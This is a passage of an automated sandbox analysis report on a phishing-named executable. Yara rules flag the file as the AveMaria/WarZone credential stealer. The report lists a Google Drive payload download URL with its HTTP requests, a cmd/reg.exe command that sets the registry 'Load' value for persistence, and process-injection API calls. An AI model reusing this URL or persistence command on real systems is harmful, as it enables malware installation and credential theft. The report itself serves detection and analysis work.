                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/4
                Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnY
                Source: Sales Order List.exe, 00000004.00000003.125743205436.00000000018AE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnawmvg8FJU4CwcICFY
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnc
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.comn
                Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
                Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.comows.CB
                Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.com8
                Source: WerFault.exe, 00000014.00000003.125950197304.0000000002D61000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemet
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
                Source: explorer.exe, 0000000B.00000002.130416256186.00000000104AE000.00000004.00000001.sdmpString found in binary or memory: https://wns.windows.com/
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 0000000B.00000002.130414430727.0000000010370000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
                Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpA
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpU
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: unknownDNS traffic detected: queries for: drive.google.com
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: -> version: TLS 1.2
                Source: unknownHTTPS traffic detected: -> version: TLS 1.2
                Source: WerFault.exe, 00000014.00000003.125903793452.0000000002D9E000.00000004.00000001.sdmpBinary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
                Source: Sales Order List.exeBinary or memory string: GetRawInputData

                E-Banking Fraud:

                Yara detected AveMaria stealerShow sources
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY

                System Summary:

                Malicious sample detected (through community Yara rule)Show sources
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Initial sample is a PE file and has a suspicious nameShow sources
                Source: initial sampleStatic PE information: Filename: Sales Order List.exe
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E1E3D
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED671
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F6B37
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EDBA3
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED01F
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E3D31
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC22A
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E4279
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EAE56
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E42A5
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EAAA3
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EA68C
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EE295
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EA691
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC2E4
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBADD
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E2ED9
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E12D4
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBED0
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F2B30
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F4F00
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB34D
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB745
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E5B99
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E9FE8
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC7CD
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBBD1
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC024
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED414
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED079
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB0C8
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED8D8
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC539
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E2D33
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F3D63
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB98D
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBD85
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F4993
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB5E0
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED5FC
                Source: C:\ProgramData\images.exeCode function: 15_2_02346B37
                Source: C:\ProgramData\images.exeCode function: 15_2_0233DBA3
                Source: C:\ProgramData\images.exeCode function: 15_2_02343D63
                Source: C:\ProgramData\images.exeCode function: 15_2_02334279
                Source: C:\ProgramData\images.exeCode function: 15_2_023342A5
                Source: C:\ProgramData\images.exeCode function: 15_2_0233E295
                Source: C:\ProgramData\images.exeCode function: 15_2_023312D4
                Source: C:\ProgramData\images.exeCode function: 15_2_02342B30
                Source: C:\ProgramData\images.exeCode function: 15_2_02344F00
                Source: C:\ProgramData\images.exeCode function: 15_2_02339FE8
                Source: C:\ProgramData\images.exeCode function: 15_2_02333FD5
                Source: C:\ProgramData\images.exeCode function: 15_2_0233DBDF
                Source: C:\ProgramData\images.exeCode function: 15_2_0233D01F
                Source: C:\ProgramData\images.exeCode function: 15_2_02344993
                Source: C:\ProgramData\images.exeCode function: 15_2_0233D5FC
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EDBA3 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED01F NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E3D31 NtWriteVirtualMemory,TerminateProcess,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F6548 NtProtectVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC22A NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EDE40 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EAE56 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EAAA3 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC2E4 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBADD NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBED0 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F4F00 NtWriteVirtualMemory,LoadLibraryA,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB34D NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB745 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC7CD NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBBD1 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC024 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB0C8 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED8D8 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC539 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EDD13 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F3D63 NtWriteVirtualMemory,LoadLibraryA,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB98D NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EBD85 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EB5E0 NtWriteVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 4_2_0167834D Sleep,NtProtectVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 4_2_016780FC NtProtectVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 4_2_01678529 NtProtectVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 4_2_016780F7 NtProtectVirtualMemory,
                Source: C:\ProgramData\images.exeCode function: 15_2_0233DBA3 NtAllocateVirtualMemory,
                Source: C:\ProgramData\images.exeCode function: 15_2_0233DBDF NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess Stats: CPU usage > 98%
                Source: Sales Order List.exe, 00000002.00000000.125342747784.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
                Source: Sales Order List.exe, 00000004.00000000.125542114197.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
                Source: Sales Order List.exeBinary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
                Source: Sales Order List.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Sales Order List.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: images.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: images.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Users\user\Desktop\Sales Order List.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\Sales Order List.exeSection loaded: edgegdi.dll
                Source: C:\ProgramData\images.exeSection loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                Source: Sales Order List.exeReversingLabs: Detection: 40%
                Source: C:\Users\user\Desktop\Sales Order List.exeFile read: C:\Users\user\Desktop\Sales Order List.exeJump to behavior
                Source: Sales Order List.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Sales Order List.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\Sales Order List.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\ProgramData\images.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: unknownProcess created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
                Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                Source: C:\Users\user\Desktop\Sales Order List.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                Source: C:\Users\user\Desktop\Sales Order List.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: C:\Users\user\Desktop\Sales Order List.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
                Source: C:\Users\user\Desktop\Sales Order List.exeFile created: C:\Users\user\AppData\Local\Temp\~DF052E41D7F13B5154.TMPJump to behavior
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@12/14@2/4
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4192
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
                Source: C:\Users\user\Desktop\Sales Order List.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Sales Order List.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
                Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
